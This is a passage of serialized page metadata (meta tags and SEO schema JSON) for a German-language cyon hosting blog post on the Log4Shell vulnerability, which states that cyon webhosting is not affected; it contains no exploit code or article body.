property=\"og:image:type\" content=\"image\u002Fjpeg\" \u002F>\n\u003Cmeta name=\"author\" content=\"Philipp Zeder\" \u002F>\n\u003Cmeta name=\"twitter:card\" content=\"summary_large_image\" \u002F>\n\u003Cmeta name=\"twitter:image\" content=\"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell-tw-card.jpg\" \u002F>\n\u003Cmeta name=\"twitter:creator\" content=\"@zedpelin\" \u002F>\n\u003Cmeta name=\"twitter:site\" content=\"@cyon\" \u002F>\n\u003Cmeta name=\"twitter:label1\" content=\"Verfasst von\" \u002F>\n\t\u003Cmeta name=\"twitter:data1\" content=\"Philipp Zeder\" \u002F>\n\t\u003Cmeta name=\"twitter:label2\" content=\"Geschätzte Lesezeit\" \u002F>\n\t\u003Cmeta name=\"twitter:data2\" content=\"5 Minuten\" \u002F>\n\u003Cscript type=\"application\u002Fld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\u002F\\\u002Fschema.org\",\"@graph\":[{\"@type\":[\"Article\",\"BlogPosting\"],\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#article\",\"isPartOf\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell\"},\"author\":{\"name\":\"Philipp Zeder\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#\\\u002Fschema\\\u002Fperson\\\u002F2aaa25a0a1557c97fc7c5d07f9d0e651\"},\"headline\":\"Log4Shell &#8211; Sicherheitslücke sorgt Ende 2021 für Furore\",\"datePublished\":\"2021-12-16T13:04:31+00:00\",\"dateModified\":\"2025-02-20T13:59:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell\"},\"wordCount\":769,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#organization\"},\"image\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#primaryimage\"},\"thumbnailUrl\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2021\\\u002F12\\\u002Flog4shell.jpg\",\"keywords\":[\"Sicherheit\"],\"articleSection\":[\"Internet &amp; Recht\"],\"inLanguage\":\"de-CH\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell\",\"url\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell\",\"name\":\"Log4Shell - Sicherheitslücke sorgt Ende 2021 für Furore\",\"isPartOf\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#primaryimage\"},\"image\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#primaryimage\"},\"thumbnailUrl\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2021\\\u002F12\\\u002Flog4shell.jpg\",\"datePublished\":\"2021-12-16T13:04:31+00:00\",\"dateModified\":\"2025-02-20T13:59:41+00:00\",\"description\":\"Zurzeit sorgt eine Sicherheitslücke für Furore im Netz. So viel vorweg: Dein Webhosting bei cyon ist davon nicht betroffen.\",\"breadcrumb\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#breadcrumb\"},\"inLanguage\":\"de-CH\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-CH\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#primaryimage\",\"url\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2021\\\u002F12\\\u002Flog4shell.jpg\",\"contentUrl\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2021\\\u002F12\\\u002Flog4shell.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002Flog4shell#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Log4Shell &#8211; Sicherheitslücke sorgt Ende 2021 für Furore\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#website\",\"url\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F\",\"name\":\"cyon-Blog\",\"description\":\"Herzlich. Nachhaltig. Schnell. Sicher. Ästhetisch. Unser Blog - Deine Plattform für inspirierende Hosting-News.\",\"publisher\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-CH\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#organization\",\"name\":\"cyon\",\"url\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de-CH\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#\\\u002Fschema\\\u002Flogo\\\u002Fimage\\\u002F\",\"url\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2025\\\u002F06\\\u002Fo_RGB_ColorfulOnWhite-01.png\",\"contentUrl\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2025\\\u002F06\\\u002Fo_RGB_ColorfulOnWhite-01.png\",\"width\":939,\"height\":938,\"caption\":\"cyon\"},\"image\":{\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#\\\u002Fschema\\\u002Flogo\\\u002Fimage\\\u002F\"},\"sameAs\":[\"https:\\\u002F\\\u002Fwww.facebook.com\\\u002Fcyonhosting\",\"https:\\\u002F\\\u002Fx.com\\\u002Fcyon\",\"https:\\\u002F\\\u002Fswiss.social\\\u002F@cyon\",\"https:\\\u002F\\\u002Finstagram.com\\\u002Fcyon.ch\\\u002F\",\"https:\\\u002F\\\u002Fwww.linkedin.com\\\u002Fcompany\\\u002F1876493\\\u002F\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\u002F\\\u002Fwww.cyon.ch\\\u002Fblog\\\u002F#\\\u002Fschema\\\u002Fperson\\\u002F2aaa25a0a1557c97fc7c5d07f9d0e651\",\"name\":\"Philipp Zeder\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de-CH\",\"@id\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2025\\\u002F03\\\u002Fcropped-pz-avatar-96x96.jpeg\",\"url\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2025\\\u002F03\\\u002Fcropped-pz-avatar-96x96.jpeg\",\"contentUrl\":\"https:\\\u002F\\\u002Fblog.cyon.ch\\\u002Fwp-content\\\u002Fuploads\\\u002F2025\\\u002F03\\\u002Fcropped-pz-avatar-96x96.jpeg\",\"caption\":\"Philipp Zeder\"},\"sameAs\":[\"https:\\\u002F\\\u002Fx.com\\\u002Fzedpelin\"]}]}\u003C\u002Fscript>\n\u003C!-- \u002F Yoast SEO Premium plugin. -->","Zurzeit sorgt eine Sicherheitslücke für Furore im Netz. So viel vorweg: Dein Webhosting bei cyon ist davon nicht betroffen.","follow","index","Log4Shell - Sicherheitslücke sorgt Ende 2021 für Furore","2025-02-20T13:59:41+00:00",{"mediaItemUrl":432},"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell-fb-li.jpg",{"node":434},{"id":435,"email":436,"name":437,"avatar":438},"dXNlcjox","pz@cyon.ch","Philipp Zeder",{"url":439,"height":198,"width":198},"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2025\u002F03\u002Fcropped-pz-avatar-96x96.jpeg",{"nodes":441},[]]